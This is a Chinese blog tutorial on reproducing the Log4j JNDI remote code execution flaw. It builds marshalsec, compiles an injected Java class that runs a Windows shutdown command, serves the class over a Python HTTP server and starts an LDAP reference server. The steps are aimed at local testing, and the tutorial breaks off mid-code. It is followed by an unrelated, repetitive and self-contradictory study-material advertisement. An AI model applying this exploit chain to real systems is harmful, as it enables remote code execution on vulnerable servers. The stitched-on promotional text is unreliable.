介绍在windows下进行 Log4j 漏洞测试,linux上步骤也都一样。
1、参照项目,项目地址: https://github.com/mbechler/marshalsec
克隆代码到本地,mvn clean package -DskipTests
打包,target 目录下会生成marshalsec-0.0.3-SNAPSHOT-all.jar
2、新建一个普通的 java 类,等会将此类注入到待测试的项目中。可以随便写逻辑 (生成文件、定时关机等)
示例: 功能是在windows系统下,3600秒后关机
import java.io.File;
import java.io.IOException;
/**
- @author rxf113
*/
public class InjectClass {
public InjectClass() {
try {
Runtime.getRuntime().exec(new String[]{“cmd.exe”, “/c”, “Shutdown.exe -s -t 3600”});
// new File(System.getProperty(“user.dir”) + “\” + System.currentTimeMillis() + “.txt”).createNewFile();
} catch (IOException e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
new InjectClass();
}
}
3、对上面的类执行 javac 编译,然后启动一个http 服务器,能通过服务器访问到编译后的 class 文件
示例: 使用python,我编译后的class文件在F:\log4j2-test\src\main\java
目录下。在 cmd窗口运行以下命令
python -m http.server 9011 -d F:\log4j2-test\src\main\java
如果成功,浏览器访问 http://127.0.0.1:9011/InjectClass.class 就能下载到class文件。
4、新打开一个 cmd 窗口启动第一步打包好的jar包。
参照命令:
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.(LDAP|RMI)RefServer # []
示例: 启动 LDAPSERVER
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer “http://127.0.0.1:9011/#InjectClass”
启动成功后: 控制台会输出监听的端口为:1389
所需的步骤全部做完了,接下来开始测试
1、运行本地待测试的项目。使用 log4j 打印日志
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
/**
- @author rxf113
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数初中级Android工程师,想要提升技能,往往是自己摸索成长,自己不成体系的自学效果低效漫长且无助。
因此收集整理了一份《2024年Web前端开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Android开发知识点!不论你是刚入门Android开发的新手,还是希望在技术上不断提升的资深开发者,这些资料都将为你打开新的学习之门!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
你打开新的学习之门!**
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!